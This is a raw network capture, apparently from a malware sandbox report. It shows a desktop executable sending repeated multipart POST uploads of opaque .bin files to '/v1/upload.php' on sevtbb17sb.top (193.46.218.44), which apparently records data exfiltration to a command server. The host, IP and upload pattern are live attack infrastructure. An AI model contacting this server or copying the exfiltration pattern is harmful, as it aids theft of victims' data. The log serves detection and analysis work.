Oct 20, 2024 15:25:18.177449942 CEST	1236	OUT	Data Raw: b5 b6 9a d2 fb 0f 60 ea 5a 7f bb 8b 0c e6 29 06 be e5 3c 88 f8 4d 5d 68 cd d6 9f fe ed 86 9e 06 68 48 74 02 62 fe 43 c1 9f 35 56 a1 27 d8 ae 7a cc 75 c1 5d 93 6c be 03 b7 1c 32 bc 75 4a 32 0d f5 be 4f af ef c4 3d 63 4d 9c 26 60 61 dc 82 c7 90 bd Data Ascii: `Z)<M]hhHtbC5V'zu]l2uJ2O=cM&`azGbgw/@i;Vg64$sf(@]JF%Iqd!t7$#47\|wRS{<}<'lZ;m+_nHiRqKJ0ccf#0~."_
Oct 20, 2024 15:25:18.177552938 CEST	4944	OUT	Data Raw: f6 23 8f da e4 ac 85 72 8a 60 49 18 51 6f 63 e2 5a ab 14 a5 7d 8b 37 08 af 3e c1 de a8 46 49 47 13 b6 3f 5c 75 84 6e 82 a7 38 2d c3 6f c4 e3 58 21 2e 84 18 ac 3c c0 47 46 cd 71 c2 74 dc e1 24 28 03 b0 2b b7 47 f3 d4 8a 51 52 86 14 da 54 b4 c9 ff Data Ascii: #r`IQocZ}7>FIG?\un8-oX!.<GFqt$(+GQRT3"7%&v[A*KWg_aM8i("o"/%i-C@s#N-UnV!.f+^89'3Y7 leo,mu%ItLe!
Oct 20, 2024 15:25:18.177570105 CEST	2472	OUT	Data Raw: 9b 82 87 b8 f0 9f 89 b2 20 7b 3b a4 67 eb fa ca 00 a9 fd 04 a5 ec c5 9e 83 5a da ff 7e 91 8a f8 d9 14 e1 00 58 47 c0 d7 b4 18 00 95 cf 87 dd e3 7e 2a db f1 7e b5 08 5d d2 ff 8f 12 3f 4b 88 61 84 55 eb 58 73 91 22 a7 17 b0 71 81 ea 38 48 71 13 66 Data Ascii: {;gZ~XG~*~]?KaUXs"q8Hqf~LO"GuBnqNMsP!X]^Z.;"GB$LrOhHo+~]!/id(5%>\fe-:qcW@`<W\eI$w$;6]x//rkVCuiv_g~
Oct 20, 2024 15:25:18.181927919 CEST	2472	OUT	Data Raw: 2f c7 33 ac b9 b5 2b 07 36 e3 88 c8 2f 6e 8f 32 a8 92 9b 05 18 4c d1 75 13 d1 8f b7 96 a7 0c d7 d3 11 4f 15 33 5d da d3 bd 89 f1 6b 3a 98 7a ab 4d 2c 18 be a2 d7 f7 fa 4f 25 36 9f 53 8e 15 bb 74 1c fc 1f 6b d2 05 86 7f cd d8 a3 9d 0b e2 93 51 c4 Data Ascii: /3+6/n2LuO3]k:zM,O%6StkQU6'eFe@E&<\|uEeM@.fUh,0@hG+AUq-vH ,v}zL&2o{K@7r0aA*b%oScCc
Oct 20, 2024 15:25:18.182090044 CEST	2472	OUT	Data Raw: 33 85 39 27 22 1b 99 52 1e 79 85 4a 15 4b 88 a3 82 d1 f3 7e a6 ad ca 51 30 d4 bc 3d 9d e1 8d ac f3 7c 84 24 5d cf 2a 94 1e 90 2c 5b 65 24 83 dc f5 7b c2 82 1c 47 ef 73 b5 b7 d4 79 27 0b b7 e1 d0 ed 2d 31 a6 ad 31 e3 43 0e 18 28 1f c8 5a 08 13 78 Data Ascii: 39'"RyJK~Q0=\|$]*,[e${Gsy'-11C(Zxt0)x=$'@"gm;VUPB[s3hn(`K{H'+h-[N^$/0`bO#3KK=FjH?k\-iNdm'a0973pha3ZGx

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49738	193.46.218.44	80	7472	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 15:25:20.280168056 CEST	335	OUT	POST /v1/upload.php HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: multipart/form-data; boundary=----Boundary41997986 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Content-Length: 63800 Host: sevtbb17sb.top
Oct 20, 2024 15:25:20.280255079 CEST	11124	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 6f 75 6e 64 61 72 79 34 31 39 39 37 39 38 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 69 6c Data Ascii: ------Boundary41997986Content-Disposition: form-data; name="file"; filename="Piloqaxe.bin"Content-Type: application/octet-streamnviN@UNsGzR*XVA%\|Rg7t'S :3[J/Gklb [od/i
Oct 20, 2024 15:25:20.285068035 CEST	1236	OUT	Data Raw: cb cf 11 64 ea d2 eb fc c7 27 16 4c 86 b2 98 33 88 26 1c 20 ba dd 8b b1 28 4c fc 9d a3 fd 09 c6 6e f4 7d ea 4c a3 63 a7 47 20 c7 19 6f 2d 43 bc 4d ca 9d 5d fd 83 63 48 c1 69 76 59 73 bf 58 3a c2 f2 a3 75 ac a6 87 d3 12 b4 7f 16 f3 42 54 b0 78 96 Data Ascii: d'L3& (Ln}LcG o-CM]cHivYsX:uBTx+]{tHG:/!M&Y@TV4[MrUPGW+<7/k-]p>2}Y8=0O(erPAv`jH]Ui3$al
Oct 20, 2024 15:25:20.285170078 CEST	2472	OUT	Data Raw: cd ba a6 4d d9 fe 3e 4d 15 64 cd e4 96 21 d7 2e ae 43 d7 d9 0e 3f 57 15 7f 7c b3 50 51 4d 19 40 71 5e 5d 67 54 5e 00 75 e3 9b 38 e3 6e be 1b 91 9a 2f 88 88 8b 2d 3f 73 f4 2e 18 d8 a4 41 92 24 42 cc 02 10 27 c3 b8 55 10 6a 67 c4 e6 b7 28 a0 49 78 Data Ascii: M>Md!.C?W\|PQM@q^]gT^u8n/-?s.A$B'Ujg(IxPw}!Na,5~LB[MyMbldiC%WWkf[zJ/?:i9\|\|D0mku51umS]um8xE.js_QB$;!
Oct 20, 2024 15:25:20.285207987 CEST	2472	OUT	Data Raw: c1 ae 8c d5 80 b8 91 55 dd df 3f 7f bc c8 72 f3 8b 28 96 39 b7 29 40 50 94 56 cf 2a 77 9c 71 bd f7 35 eb 83 b0 0d 16 5d 2f 0a b8 09 22 88 c1 1c ec 13 ac 5b 8e 58 81 70 29 13 bb e7 3d 17 50 94 e2 3e 5b 94 13 f8 ff f7 62 cc 1f 6b 6b 5b 73 95 2c 65 Data Ascii: U?r(9)@PVwq5]/"[Xp)=P>[bkk[s,e6Klf\|=P_%)H20\|m>.,W$`#}S]"$,3;-f4Wwjh=Zw.*b\hr=C]j/n=I`RA1CufUGGH5q"
Oct 20, 2024 15:25:20.285276890 CEST	2472	OUT	Data Raw: 3a 42 08 88 ce 4e 05 ff f2 ae 22 df 66 86 36 20 3d a9 8e 16 1b 14 1d 76 92 5e 04 4d 31 c8 de 9c bb 45 0e c4 3b a6 e9 85 71 7e 52 d3 4d a9 c2 5e 71 34 02 95 63 0b 62 ba c7 a5 8e 0a 62 ed 85 fc 7e 47 49 0e a7 1f 37 72 8d 17 28 9c b8 47 89 e8 2c 3e Data Ascii: :BN"f6 =v^M1E;q~RM^q4cbb~GI7r(G,>a:BC(K8HNe@snD^R#SM,k}Mx!(DTuiio56#Ud44b\GR =?"t5TRKK*K=
Oct 20, 2024 15:25:20.285320997 CEST	2472	OUT	Data Raw: ab 68 9b 83 86 59 61 ee 4b 3f 07 aa 38 90 ae 18 f2 de 36 a4 f3 03 6b e5 88 b8 f3 fe 28 f8 69 fa 3e 0e 8b 83 37 8b 63 71 70 51 d6 93 ca e9 42 fc 5d fc 65 69 f8 db 4d 58 eb 24 b1 36 37 7c 57 bb e7 ed 25 a7 1c 91 b3 db 08 8e 4f a7 36 78 a4 59 36 34 Data Ascii: hYaK?86k(i>7cqpQB]eiMX$67\|W%O6xY64=f0Z:Tc\|\|k<$DNp5^XuARYJ*Ku34a[dUwhcyjw"Q>w6[?co]X<_}V~}>hc_(
Oct 20, 2024 15:25:20.285383940 CEST	2472	OUT	Data Raw: 79 39 05 ca 17 4e 8e 10 7d 71 46 f6 59 c0 a9 e8 d9 b5 bb 11 02 1d dc 91 89 22 1c 1f 33 1f 71 51 90 37 e9 3e 56 85 05 9e ab 1e 46 37 25 32 03 8c ff c6 a3 56 4a 75 7c f0 da 9e 6d d1 13 f1 73 96 db 69 15 01 d6 fc 32 da 1d a4 cb cf 0f e9 37 3e 45 a2 Data Ascii: y9N}qFY"3qQ7>VF7%2VJu\|msi27>ElH}bYf)9lE;7:Iz[U\h3H]hW.nW:,q4,Mm25,N53[eah1oAw;Z82:9 bd,)#wM;[7,cE)
Oct 20, 2024 15:25:20.286046028 CEST	2472	OUT	Data Raw: f6 23 8f da e4 ac 85 72 8a 60 49 18 51 6f 63 e2 5a ab 14 a5 7d 8b 37 08 af 3e c1 de a8 46 49 47 13 b6 3f 5c 75 84 6e 82 a7 38 2d c3 6f c4 e3 58 21 2e 84 18 ac 3c c0 47 46 cd 71 c2 74 dc e1 24 28 03 b0 2b b7 47 f3 d4 8a 51 52 86 14 da 54 b4 c9 ff Data Ascii: #r`IQocZ}7>FIG?\un8-oX!.<GFqt$(+GQRT3"7%&v[A*KWg_aM8i("o"/%i-C@s#N-UnV!.f+^89'3Y7 leo,mu%ItLe!
Oct 20, 2024 15:25:20.286072969 CEST	2472	OUT	Data Raw: ad 1e b3 0a 66 81 50 94 2b 63 41 8b 4f b6 31 36 e8 a6 83 aa 5b e0 44 da c3 4f 0d 78 02 7f fe dd 46 89 5f 7e f4 e5 d6 dc b0 3e 1f 19 35 68 bc 14 6f ed 55 5d 9c 13 be 50 b5 bc 55 14 56 a5 a5 8c 2c ee 57 f7 aa ca 67 3c 42 d7 b1 5c 2c 0d 2c 13 2f 8b Data Ascii: fP+cAO16[DOxF_~>5hoU]PUV,Wg<B\,,/T7LRo&LEL1jL*p>/aMUNh#jX(V7f:=vfg0\|##K)2a,o>zyMMs .;`LJ-y{<d>h?idu5T8NsX
Oct 20, 2024 15:25:20.286093950 CEST	2472	OUT	Data Raw: 9b 82 87 b8 f0 9f 89 b2 20 7b 3b a4 67 eb fa ca 00 a9 fd 04 a5 ec c5 9e 83 5a da ff 7e 91 8a f8 d9 14 e1 00 58 47 c0 d7 b4 18 00 95 cf 87 dd e3 7e 2a db f1 7e b5 08 5d d2 ff 8f 12 3f 4b 88 61 84 55 eb 58 73 91 22 a7 17 b0 71 81 ea 38 48 71 13 66 Data Ascii: {;gZ~XG~*~]?KaUXs"q8Hqf~LO"GuBnqNMsP!X]^Z.;"GB$LrOhHo+~]!/id(5%>\fe-:qcW@`<W\eI$w$;6]x//rkVCuiv_g~

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49741	193.46.218.44	80	7472	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 15:25:22.045547962 CEST	335	OUT	POST /v1/upload.php HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: multipart/form-data; boundary=----Boundary41997986 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Content-Length: 63800 Host: sevtbb17sb.top
Oct 20, 2024 15:25:22.045614958 CEST	11124	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 6f 75 6e 64 61 72 79 34 31 39 39 37 39 38 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 69 6c Data Ascii: ------Boundary41997986Content-Disposition: form-data; name="file"; filename="Piloqaxe.bin"Content-Type: application/octet-streamnviN@UNsGzR*XVA%\|Rg7t'S :3[J/Gklb [od/i
Oct 20, 2024 15:25:22.050594091 CEST	1236	OUT	Data Raw: cb cf 11 64 ea d2 eb fc c7 27 16 4c 86 b2 98 33 88 26 1c 20 ba dd 8b b1 28 4c fc 9d a3 fd 09 c6 6e f4 7d ea 4c a3 63 a7 47 20 c7 19 6f 2d 43 bc 4d ca 9d 5d fd 83 63 48 c1 69 76 59 73 bf 58 3a c2 f2 a3 75 ac a6 87 d3 12 b4 7f 16 f3 42 54 b0 78 96 Data Ascii: d'L3& (Ln}LcG o-CM]cHivYsX:uBTx+]{tHG:/!M&Y@TV4[MrUPGW+<7/k-]p>2}Y8=0O(erPAv`jH]Ui3$al
Oct 20, 2024 15:25:22.050785065 CEST	2472	OUT	Data Raw: cd ba a6 4d d9 fe 3e 4d 15 64 cd e4 96 21 d7 2e ae 43 d7 d9 0e 3f 57 15 7f 7c b3 50 51 4d 19 40 71 5e 5d 67 54 5e 00 75 e3 9b 38 e3 6e be 1b 91 9a 2f 88 88 8b 2d 3f 73 f4 2e 18 d8 a4 41 92 24 42 cc 02 10 27 c3 b8 55 10 6a 67 c4 e6 b7 28 a0 49 78 Data Ascii: M>Md!.C?W\|PQM@q^]gT^u8n/-?s.A$B'Ujg(IxPw}!Na,5~LB[MyMbldiC%WWkf[zJ/?:i9\|\|D0mku51umS]um8xE.js_QB$;!
Oct 20, 2024 15:25:22.050826073 CEST	4944	OUT	Data Raw: c1 ae 8c d5 80 b8 91 55 dd df 3f 7f bc c8 72 f3 8b 28 96 39 b7 29 40 50 94 56 cf 2a 77 9c 71 bd f7 35 eb 83 b0 0d 16 5d 2f 0a b8 09 22 88 c1 1c ec 13 ac 5b 8e 58 81 70 29 13 bb e7 3d 17 50 94 e2 3e 5b 94 13 f8 ff f7 62 cc 1f 6b 6b 5b 73 95 2c 65 Data Ascii: U?r(9)@PVwq5]/"[Xp)=P>[bkk[s,e6Klf\|=P_%)H20\|m>.,W$`#}S]"$,3;-f4Wwjh=Zw.*b\hr=C]j/n=I`RA1CufUGGH5q"
Oct 20, 2024 15:25:22.050860882 CEST	2472	OUT	Data Raw: ab 68 9b 83 86 59 61 ee 4b 3f 07 aa 38 90 ae 18 f2 de 36 a4 f3 03 6b e5 88 b8 f3 fe 28 f8 69 fa 3e 0e 8b 83 37 8b 63 71 70 51 d6 93 ca e9 42 fc 5d fc 65 69 f8 db 4d 58 eb 24 b1 36 37 7c 57 bb e7 ed 25 a7 1c 91 b3 db 08 8e 4f a7 36 78 a4 59 36 34 Data Ascii: hYaK?86k(i>7cqpQB]eiMX$67\|W%O6xY64=f0Z:Tc\|\|k<$DNp5^XuARYJ*Ku34a[dUwhcyjw"Q>w6[?co]X<_}V~}>hc_(
Oct 20, 2024 15:25:22.050888062 CEST	2472	OUT	Data Raw: 79 39 05 ca 17 4e 8e 10 7d 71 46 f6 59 c0 a9 e8 d9 b5 bb 11 02 1d dc 91 89 22 1c 1f 33 1f 71 51 90 37 e9 3e 56 85 05 9e ab 1e 46 37 25 32 03 8c ff c6 a3 56 4a 75 7c f0 da 9e 6d d1 13 f1 73 96 db 69 15 01 d6 fc 32 da 1d a4 cb cf 0f e9 37 3e 45 a2 Data Ascii: y9N}qFY"3qQ7>VF7%2VJu\|msi27>ElH}bYf)9lE;7:Iz[U\h3H]hW.nW:,q4,Mm25,N53[eah1oAw;Z82:9 bd,)#wM;[7,cE)
Oct 20, 2024 15:25:22.050961971 CEST	2472	OUT	Data Raw: f6 23 8f da e4 ac 85 72 8a 60 49 18 51 6f 63 e2 5a ab 14 a5 7d 8b 37 08 af 3e c1 de a8 46 49 47 13 b6 3f 5c 75 84 6e 82 a7 38 2d c3 6f c4 e3 58 21 2e 84 18 ac 3c c0 47 46 cd 71 c2 74 dc e1 24 28 03 b0 2b b7 47 f3 d4 8a 51 52 86 14 da 54 b4 c9 ff Data Ascii: #r`IQocZ}7>FIG?\un8-oX!.<GFqt$(+GQRT3"7%&v[A*KWg_aM8i("o"/%i-C@s#N-UnV!.f+^89'3Y7 leo,mu%ItLe!
Oct 20, 2024 15:25:22.050988913 CEST	2472	OUT	Data Raw: ad 1e b3 0a 66 81 50 94 2b 63 41 8b 4f b6 31 36 e8 a6 83 aa 5b e0 44 da c3 4f 0d 78 02 7f fe dd 46 89 5f 7e f4 e5 d6 dc b0 3e 1f 19 35 68 bc 14 6f ed 55 5d 9c 13 be 50 b5 bc 55 14 56 a5 a5 8c 2c ee 57 f7 aa ca 67 3c 42 d7 b1 5c 2c 0d 2c 13 2f 8b Data Ascii: fP+cAO16[DOxF_~>5hoU]PUV,Wg<B\,,/T7LRo&LEL1jL*p>/aMUNh#jX(V7f:=vfg0\|##K)2a,o>zyMMs .;`LJ-y{<d>h?idu5T8NsX
Oct 20, 2024 15:25:22.051016092 CEST	2472	OUT	Data Raw: 9b 82 87 b8 f0 9f 89 b2 20 7b 3b a4 67 eb fa ca 00 a9 fd 04 a5 ec c5 9e 83 5a da ff 7e 91 8a f8 d9 14 e1 00 58 47 c0 d7 b4 18 00 95 cf 87 dd e3 7e 2a db f1 7e b5 08 5d d2 ff 8f 12 3f 4b 88 61 84 55 eb 58 73 91 22 a7 17 b0 71 81 ea 38 48 71 13 66 Data Ascii: {;gZ~XG~*~]?KaUXs"q8Hqf~LO"GuBnqNMsP!X]^Z.;"GB$LrOhHo+~]!/id(5%>\fe-:qcW@`<W\eI$w$;6]x//rkVCuiv_g~
Oct 20, 2024 15:25:22.055351973 CEST	2472	OUT	Data Raw: 2f c7 33 ac b9 b5 2b 07 36 e3 88 c8 2f 6e 8f 32 a8 92 9b 05 18 4c d1 75 13 d1 8f b7 96 a7 0c d7 d3 11 4f 15 33 5d da d3 bd 89 f1 6b 3a 98 7a ab 4d 2c 18 be a2 d7 f7 fa 4f 25 36 9f 53 8e 15 bb 74 1c fc 1f 6b d2 05 86 7f cd d8 a3 9d 0b e2 93 51 c4 Data Ascii: /3+6/n2LuO3]k:zM,O%6StkQU6'eFe@E&<\|uEeM@.fUh,0@hG+AUq-vH ,v}zL&2o{K@7r0aA*b%oScCc

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49744	193.46.218.44	80	7472	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 15:25:23.675051928 CEST	335	OUT	POST /v1/upload.php HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: multipart/form-data; boundary=----Boundary41997986 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Content-Length: 63800 Host: sevtbb17sb.top
Oct 20, 2024 15:25:23.675156116 CEST	11124	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 6f 75 6e 64 61 72 79 34 31 39 39 37 39 38 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 69 6c Data Ascii: ------Boundary41997986Content-Disposition: form-data; name="file"; filename="Piloqaxe.bin"Content-Type: application/octet-streamnviN@UNsGzR*XVA%\|Rg7t'S :3[J/Gklb [od/i
Oct 20, 2024 15:25:23.680222034 CEST	1236	OUT	Data Raw: cb cf 11 64 ea d2 eb fc c7 27 16 4c 86 b2 98 33 88 26 1c 20 ba dd 8b b1 28 4c fc 9d a3 fd 09 c6 6e f4 7d ea 4c a3 63 a7 47 20 c7 19 6f 2d 43 bc 4d ca 9d 5d fd 83 63 48 c1 69 76 59 73 bf 58 3a c2 f2 a3 75 ac a6 87 d3 12 b4 7f 16 f3 42 54 b0 78 96 Data Ascii: d'L3& (Ln}LcG o-CM]cHivYsX:uBTx+]{tHG:/!M&Y@TV4[MrUPGW+<7/k-]p>2}Y8=0O(erPAv`jH]Ui3$al
Oct 20, 2024 15:25:23.680250883 CEST	2472	OUT	Data Raw: cd ba a6 4d d9 fe 3e 4d 15 64 cd e4 96 21 d7 2e ae 43 d7 d9 0e 3f 57 15 7f 7c b3 50 51 4d 19 40 71 5e 5d 67 54 5e 00 75 e3 9b 38 e3 6e be 1b 91 9a 2f 88 88 8b 2d 3f 73 f4 2e 18 d8 a4 41 92 24 42 cc 02 10 27 c3 b8 55 10 6a 67 c4 e6 b7 28 a0 49 78 Data Ascii: M>Md!.C?W\|PQM@q^]gT^u8n/-?s.A$B'Ujg(IxPw}!Na,5~LB[MyMbldiC%WWkf[zJ/?:i9\|\|D0mku51umS]um8xE.js_QB$;!
Oct 20, 2024 15:25:23.680291891 CEST	2472	OUT	Data Raw: c1 ae 8c d5 80 b8 91 55 dd df 3f 7f bc c8 72 f3 8b 28 96 39 b7 29 40 50 94 56 cf 2a 77 9c 71 bd f7 35 eb 83 b0 0d 16 5d 2f 0a b8 09 22 88 c1 1c ec 13 ac 5b 8e 58 81 70 29 13 bb e7 3d 17 50 94 e2 3e 5b 94 13 f8 ff f7 62 cc 1f 6b 6b 5b 73 95 2c 65 Data Ascii: U?r(9)@PVwq5]/"[Xp)=P>[bkk[s,e6Klf\|=P_%)H20\|m>.,W$`#}S]"$,3;-f4Wwjh=Zw.*b\hr=C]j/n=I`RA1CufUGGH5q"
Oct 20, 2024 15:25:23.680321932 CEST	2472	OUT	Data Raw: 3a 42 08 88 ce 4e 05 ff f2 ae 22 df 66 86 36 20 3d a9 8e 16 1b 14 1d 76 92 5e 04 4d 31 c8 de 9c bb 45 0e c4 3b a6 e9 85 71 7e 52 d3 4d a9 c2 5e 71 34 02 95 63 0b 62 ba c7 a5 8e 0a 62 ed 85 fc 7e 47 49 0e a7 1f 37 72 8d 17 28 9c b8 47 89 e8 2c 3e Data Ascii: :BN"f6 =v^M1E;q~RM^q4cbb~GI7r(G,>a:BC(K8HNe@snD^R#SM,k}Mx!(DTuiio56#Ud44b\GR =?"t5TRKK*K=
Oct 20, 2024 15:25:23.680380106 CEST	2472	OUT	Data Raw: ab 68 9b 83 86 59 61 ee 4b 3f 07 aa 38 90 ae 18 f2 de 36 a4 f3 03 6b e5 88 b8 f3 fe 28 f8 69 fa 3e 0e 8b 83 37 8b 63 71 70 51 d6 93 ca e9 42 fc 5d fc 65 69 f8 db 4d 58 eb 24 b1 36 37 7c 57 bb e7 ed 25 a7 1c 91 b3 db 08 8e 4f a7 36 78 a4 59 36 34 Data Ascii: hYaK?86k(i>7cqpQB]eiMX$67\|W%O6xY64=f0Z:Tc\|\|k<$DNp5^XuARYJ*Ku34a[dUwhcyjw"Q>w6[?co]X<_}V~}>hc_(
Oct 20, 2024 15:25:23.680404902 CEST	2472	OUT	Data Raw: 79 39 05 ca 17 4e 8e 10 7d 71 46 f6 59 c0 a9 e8 d9 b5 bb 11 02 1d dc 91 89 22 1c 1f 33 1f 71 51 90 37 e9 3e 56 85 05 9e ab 1e 46 37 25 32 03 8c ff c6 a3 56 4a 75 7c f0 da 9e 6d d1 13 f1 73 96 db 69 15 01 d6 fc 32 da 1d a4 cb cf 0f e9 37 3e 45 a2 Data Ascii: y9N}qFY"3qQ7>VF7%2VJu\|msi27>ElH}bYf)9lE;7:Iz[U\h3H]hW.nW:,q4,Mm25,N53[eah1oAw;Z82:9 bd,)#wM;[7,cE)
Oct 20, 2024 15:25:23.680546999 CEST	2472	OUT	Data Raw: f6 23 8f da e4 ac 85 72 8a 60 49 18 51 6f 63 e2 5a ab 14 a5 7d 8b 37 08 af 3e c1 de a8 46 49 47 13 b6 3f 5c 75 84 6e 82 a7 38 2d c3 6f c4 e3 58 21 2e 84 18 ac 3c c0 47 46 cd 71 c2 74 dc e1 24 28 03 b0 2b b7 47 f3 d4 8a 51 52 86 14 da 54 b4 c9 ff Data Ascii: #r`IQocZ}7>FIG?\un8-oX!.<GFqt$(+GQRT3"7%&v[A*KWg_aM8i("o"/%i-C@s#N-UnV!.f+^89'3Y7 leo,mu%ItLe!
Oct 20, 2024 15:25:23.680561066 CEST	2472	OUT	Data Raw: ad 1e b3 0a 66 81 50 94 2b 63 41 8b 4f b6 31 36 e8 a6 83 aa 5b e0 44 da c3 4f 0d 78 02 7f fe dd 46 89 5f 7e f4 e5 d6 dc b0 3e 1f 19 35 68 bc 14 6f ed 55 5d 9c 13 be 50 b5 bc 55 14 56 a5 a5 8c 2c ee 57 f7 aa ca 67 3c 42 d7 b1 5c 2c 0d 2c 13 2f 8b Data Ascii: fP+cAO16[DOxF_~>5hoU]PUV,Wg<B\,,/T7LRo&LEL1jL*p>/aMUNh#jX(V7f:=vfg0\|##K)2a,o>zyMMs .;`LJ-y{<d>h?idu5T8NsX
Oct 20, 2024 15:25:23.684849024 CEST	2472	OUT	Data Raw: 9b 82 87 b8 f0 9f 89 b2 20 7b 3b a4 67 eb fa ca 00 a9 fd 04 a5 ec c5 9e 83 5a da ff 7e 91 8a f8 d9 14 e1 00 58 47 c0 d7 b4 18 00 95 cf 87 dd e3 7e 2a db f1 7e b5 08 5d d2 ff 8f 12 3f 4b 88 61 84 55 eb 58 73 91 22 a7 17 b0 71 81 ea 38 48 71 13 66 Data Ascii: {;gZ~XG~*~]?KaUXs"q8Hqf~LO"GuBnqNMsP!X]^Z.;"GB$LrOhHo+~]!/id(5%>\fe-:qcW@`<W\eI$w$;6]x//rkVCuiv_g~
Oct 20, 2024 15:25:25.159400940 CEST	209	IN	HTTP/1.1 200 OK Server: nginx/1.24.0 (Ubuntu) Date: Sun, 20 Oct 2024 13:25:24 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 2 Connection: close ETag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc" Data Raw: 4f 4b Data Ascii: OK

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49748	193.46.218.44	80	7472	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 15:25:26.373847961 CEST	335	OUT	POST /v1/upload.php HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: multipart/form-data; boundary=----Boundary15133046 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Content-Length: 27504 Host: sevtbb17sb.top
Oct 20, 2024 15:25:26.373910904 CEST	11124	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 6f 75 6e 64 61 72 79 31 35 31 33 33 30 34 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 58 61 6d Data Ascii: ------Boundary15133046Content-Disposition: form-data; name="file"; filename="Xamexeze.bin"Content-Type: application/octet-stream`v*BxH/s=Kp~veUs$<[j}lAbGz63n!#Dz""1\|
Oct 20, 2024 15:25:26.384248972 CEST	3708	OUT	Data Raw: c3 6d 67 6d 20 90 47 8c aa 73 16 da bc 7d b8 2b f8 01 ea 6c 67 66 9a 6c ab 66 56 0b db f3 fe 0f b5 12 0e 9e fa ca 79 c5 09 a6 28 a2 af ae 18 d0 e7 b8 2c 98 a1 66 68 07 10 4e 6f 2f 4c a0 32 f6 58 83 55 22 98 d8 8f 86 f0 02 d2 b0 36 37 1c 34 e0 ce Data Ascii: mgm Gs}+lgflfVy(,fhNo/L2XU"674MRQ6&cWM};X_X%)9\|lt@48Tqb[CGn\|t+P1_ e4OzHlt-G<jg$fJ46
Oct 20, 2024 15:25:26.384293079 CEST	12672	OUT	Data Raw: 4a e7 cc 50 d0 ed 0d 6d a8 37 f1 5e f2 d2 1f 60 a6 c5 52 d6 9a 70 17 e4 79 80 fb e4 29 ab cd 69 52 8a 2b 47 73 ff b9 96 ea 1f e5 20 89 c5 de 4e f9 cb 17 5d 60 3b ac cd 87 62 7f b4 87 13 9c e8 f8 36 78 3c de 9a f8 ca 93 a1 d6 be bf 2f 59 02 fd 8b Data Ascii: JPm7^`Rpy)iR+Gs N]`;b6x</Y#.#[6d!l<A-m 9s^Xz] Dz\U/;F2Q}s>V*O$R$r8\|,("fC48!(h_FM!2bs\rS

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49750	193.46.218.44	80	7472	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 15:25:27.936445951 CEST	335	OUT	POST /v1/upload.php HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: multipart/form-data; boundary=----Boundary15133046 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Content-Length: 27504 Host: sevtbb17sb.top
Oct 20, 2024 15:25:27.936491013 CEST	11124	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 6f 75 6e 64 61 72 79 31 35 31 33 33 30 34 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 58 61 6d Data Ascii: ------Boundary15133046Content-Disposition: form-data; name="file"; filename="Xamexeze.bin"Content-Type: application/octet-stream`v*BxH/s=Kp~veUs$<[j}lAbGz63n!#Dz""1\|
